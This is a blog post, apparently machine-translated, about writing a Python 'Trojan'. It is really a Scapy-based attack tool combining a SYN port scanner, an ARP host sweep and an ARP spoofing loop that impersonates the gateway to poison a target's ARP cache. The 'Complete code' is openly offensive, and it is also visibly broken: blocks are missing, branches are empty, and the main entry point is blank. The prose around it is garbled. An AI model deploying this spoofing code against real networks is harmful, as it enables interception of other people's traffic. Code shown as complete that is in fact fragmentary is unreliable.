Python simple Trojan

Posted by DamienRoche on Wed, 09 Mar 2022 10:43:53 +0100

Python Trojan horse writing

Problems encountered and Solutions

Start with netcat Py file, which is prepared to imitate some kali tools net cat

There was a problem. The code couldn't run out after writing, and the script couldn't be debugged with parameters. By adding print to correct the errors one by one, it was found that it was the blocking problem of recv function in socket

There are two modes: blocking and non blocking

Blocking mode: when there is data in the buffer, all data will be returned immediately; When there is no data in the buffer, block until there is data in the buffer.

Non blocking mode: when there is data in the buffer, all data will be returned immediately; When there is no data in the buffer, an EAGAIN error is generated and returned (an exception will be thrown in Python)

Errors are reported as follows

Official description

Remote host forcibly close()

It seems useless to check online

But through this, I found that there was no data transmitted from the server

For a long time

I don't know how I wrote this, Gan!

This error occurred again soon, and I found the reason for it for a long time

It can run perfectly on this machine, but not across machines. It's impossible to check a lot of data

After two days of no results, I had to give up temporarily and leave it for later thinking

Then use the module to learn netifaces

New problems

When using arpspoof

report errors

The int() function can only convert strings composed of numbers

I guess there's something wrong with the mac

I've been looking for it for a long time and found it by adding code

My global variable has no value and is blank

But I didn't find the reason. I looked for it for a long time

I found that there was a problem with the logic of my code. Finally, I solved it by adding some code

Operation process

Finally, write this

Let's see the effect









Complete code

#! /usr/bin/env python
# -*- coding:utf-8 -*-

import sys
import getopt
import time
import netifaces
from scapy.all import *

target = ""
scan_type = ""
port = 0
gateway = ""

# Help function
def help_message():
    print "You can manage your ip like this:"
    print " -t target_ip -p port --scan_type=type"
    print "[*]example:python -t -p 7777 --scantype==syn_scan"
    print "-t    specify the ip you wanna scan"
    print "-p    specify the port you wanna scan"
    print "-i    to get host network card information"
    print "--scan_type= specify the scan type you wanna use"
    print "[*]example:python -t -p 80 --scan_type=syn_scan "

# Get local network card information
def information():
    print "Net Card Information:"
    gateway = netifaces.gateways()['default'][2][0]
    nic_name = netifaces.gateways()['default'][2][1]
    for interface in netifaces.interfaces():
        if interface == nic_name:
            ip = netifaces.ifaddresses('eth0')[2][0]['addr']
            mac_addr = netifaces.ifaddresses('eth0')[17][0]['addr']
            ip_mask = netifaces.ifaddresses('eth0')[2][0]['netmask']
    print "Gateway:",gateway
    print "NIC Name:",nic_name
    print "NIC MAC Address:",mac_addr
    print "IPV4 Address:", ip
    print "IP Netmask:",ip_mask
    return mac_addr,gateway, nic_name

def main():
    global target
    global scan_type
    global port
    global gateway
    # analytic function
        opts, args = getopt.getopt(sys.argv[1:], "t:s:p:hi",
                                   ["target=", "scan_type=", "help","info", "port="])
    except Exception as e:
        print str(e)

    for opt, value in opts:
        if opt in ["-h", "--help"]:
        elif opt in ["-t", "--target"]:
            target = value
        elif opt in ["-s","--scan_type"]:
            scan_type = value
        elif opt in ["-p", "--port"]:
            port = int(value)
        elif opt in ["-i","--info"]:
    if scan_type == "syn_scan":
    elif scan_type == "arp_ping":
    elif scan_type == "arp_spoof":

# syn scan port
def syn_scan():
    global target
    global port
    ports = [20,21,22,23,25,69,80,81,109,389,443,1433,1521,2049,3306,3389,5432,8080,27017]
    if port:
        ans, unans = sr(IP(dst = target)/TCP(sport=RandShort(),dport=port),timeout=3)
        ans, unans = sr(IP(dst = target)/TCP(sport=RandShort(),dport=ports),timeout=3)
    for sent,received in ans:
        if received.haslayer(TCP) and str(received[TCP].flags) == "SA":
                print "Port " + str(sent[TCP].dport) + " of " + target + " is OPEN!"
        elif received.haslayer(TCP) and str(received[TCP].flags) == "RA":
                print "Port " + str(sent[TCP].dport) + " of " + target + " is closed!"
        elif received.haslayer(ICMP) and str(received[ICMP].type) == "3":
                print "Port " + str(sent[TCP].dport) + " of " + target + " is filtered!"

    for sent in unans:
        print str(sent[TCP].dport) + " is unanswered!"

# arp live host scan
def arp_ping():
    global target
    ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=target),timeout=3)
    for sent, received in ans:
        print received[Ether].src+"->"+received[ARP].psrc+" is alive"

# arp Spoofing
def arp_spoof():
    global target
    mac_addr,gateway, nic_name=information()
    # Get destination mac address
    target_mac = getmacbyip(target)
    if target_mac is None:
        print("[-] Error: Could not resolve targets MAC address")
    print "ARP Spoofing..."
    # Construct response package
    pkt = Ether(src=mac_addr, dst=target_mac) / ARP(hwsrc=mac_addr, psrc=gateway, hwdst=target_mac, pdst=target)
    while True:
        sendp(pkt, inter=2, iface=nic_name)

if __name__ == "__main__":

reference resources

python black hat programming hacker and penetration test programming

Reference link

Scapy-port-scanner/ at master · cptpugwash/Scapy-port-scanner · GitHub

Usage of Python scape ARP host scanning and ARP deception - fallen leaves in the rain - blog Garden

Usage of Python scape ARP host scanning and ARP deception - fallen leaves in the rain - blog Garden

Topics: Python Linux